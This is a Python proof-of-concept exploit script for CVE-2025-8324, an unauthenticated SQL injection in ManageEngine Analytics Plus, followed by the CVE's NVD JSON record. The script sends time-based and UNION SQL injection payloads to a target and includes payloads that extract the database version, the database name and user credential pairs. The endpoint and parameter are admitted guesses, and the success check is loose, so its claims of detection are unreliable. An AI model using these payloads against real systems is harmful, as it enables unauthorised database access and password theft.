CVE-2025-8324

# CVE-2025-8324 Unauthenticated SQL Injection PoC # Target: ManageEngine Analytics Plus <= 6170 # Type: SQL Injection via improper filter configuration import requests import sys def exploit_sql_injection(target_url): """ SQL Injection PoC for CVE-2025-8324 This demonstrates the vulnerability in filter configuration """ # Target endpoint - typically in reporting/filter functionality endpoint = f"{target_url}/api/filter" # SQL Injection payload - testing with time-based blind injection # Adjust payload based on actual vulnerable parameter payloads = [ "' OR SLEEP(5)-- -", "' OR 1=1 UNION SELECT NULL-- -", "' AND (SELECT * FROM (SELECT SLEEP(5))a)-- -", "admin' OR '1'='1' -- -" ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': '*/*' } print(f"[*] Target: {target_url}") print(f"[*] Testing {len(payloads)} SQL injection payloads...") for i, payload in enumerate(payloads, 1): print(f"\n[*] Testing payload {i}/{len(payloads)}") print(f"[*] Payload: {payload}") # Vulnerable parameter - adjust based on enumeration data = { 'filter_name': payload, 'report_id': '1' } try: response = requests.post( endpoint, data=data, headers=headers, timeout=10, verify=False ) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") # Check for successful injection indicators if response.status_code == 200: if 'error' not in response.text.lower() or 'success' in response.text.lower(): print(f"[!] Potential vulnerability detected!") return True except requests.exceptions.Timeout: print(f"[!] Request timed out - potential blind SQL injection!") return True except Exception as e: print(f"[-] Error: {str(e)}") return False def extract_database_info(target_url): """ Extract database information after confirming vulnerability """ # Database version extraction payload db_version_payload = "' UNION SELECT @@version-- -" # Database name extraction payload db_name_payload = "' UNION SELECT database()-- -" # Users table extraction payload users_payload = "' UNION SELECT GROUP_CONCAT(user_name,':',password) FROM users-- -" print("\n[*] Extracting database information...") # Implementation would send these payloads and parse responses if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-8324.py <target_url>") print("Example: python cve-2025-8324.py https://analytics.example.com") sys.exit(1) target = sys.argv[1] if exploit_sql_injection(target): print("\n[!] Vulnerability confirmed! Proceeding with data extraction...") # extract_database_info(target) else: print("\n[-] No vulnerability detected or target not affected")

{"cve": {"id": "CVE-2025-8324", "sourceIdentifier": "0fc0942c-577d-436f-ae8e-945763c79b02", "published": "2025-11-11T13:15:45.443", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zohocorp ManageEngine Analytics Plus versions 6170 and below are vulnerable to Unauthenticated SQL Injection due to the improper filter configuration."}], "metrics": {"cvssMetricV31": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.manageengine.com/analytics-plus/CVE-2025-8324.html", "source": "0fc0942c-577d-436f-ae8e-945763c79b02"}]}}